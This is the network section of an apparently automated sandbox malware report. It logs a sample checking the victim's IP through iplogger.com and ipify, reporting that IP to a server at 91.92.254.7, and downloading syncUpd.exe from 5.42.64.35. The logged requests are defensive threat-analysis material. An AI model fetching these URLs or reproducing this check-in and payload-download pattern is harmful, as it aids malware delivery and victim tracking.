Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
iplogger.com | 104.21.12.138 | |
api.ipify.org |
CNAME
api4.ipify.org
|
104.237.62.212 |
GET
200
https://iplogger.com/19nVA4
REQUEST
RESPONSE
BODY
GET /19nVA4 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: iplogger.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 11 Dec 2023 10:23:04 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: 513216652949678744=3; expires=Wed, 11 Dec 2024 10:23:04 GMT; Max-Age=31622400; path=/; secure; HttpOnly; SameSite=Strict
set-cookie: clhf03028ja=175.208.134.152; expires=Wed, 11 Dec 2024 10:23:04 GMT; Max-Age=31622400; path=/; secure; HttpOnly; SameSite=Strict
memory: 0.4202728271484375
expires: Mon, 11 Dec 2023 10:23:04 +0000
Cache-Control: no-store, no-cache, must-revalidate
strict-transport-security: max-age=604800
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
x-frame-options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YaS%2FpwNPYz58ZEYgEzNzD8ni4btPe%2BVS1YKg8KGVbEe4aW02sHqGFP8LCP6kITLrWj9Kfxc37kE08y40hIR2Y3O72Fj1P4rwtogU%2FOMyN%2FFxnfKwjH2QqWeW7SB2Mg0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 833d029299a52b73-LAX
alt-svc: h3=":443"; ma=86400
GET
200
http://api.ipify.org/?format=scc
REQUEST
RESPONSE
BODY
GET /?format=scc HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: api.ipify.org
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.25.2
Date: Mon, 11 Dec 2023 10:23:00 GMT
Content-Type: text/plain
Content-Length: 15
Connection: keep-alive
Vary: Origin
GET
200
http://91.92.254.7/scripts/plus.php?ip=175.208.134.152&substr=nine&s=ab
REQUEST
RESPONSE
BODY
GET /scripts/plus.php?ip=175.208.134.152&substr=nine&s=ab HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 91.92.254.7
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 11 Dec 2023 10:23:00 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET
200
http://5.42.64.35/syncUpd.exe
REQUEST
RESPONSE
BODY
GET /syncUpd.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 5.42.64.35
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 11 Dec 2023 10:23:01 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Mon, 11 Dec 2023 10:15:01 GMT
ETag: "2e600-60c3934fb849a"
Accept-Ranges: bytes
Content-Length: 189952
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49171 172.67.194.188:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=iplogger.com | c1:91:92:9b:9a:80:29:75:dc:65:9b:a4:c0:11:8c:ac:72:d6:77:58 |
Snort Alerts
No Snort Alerts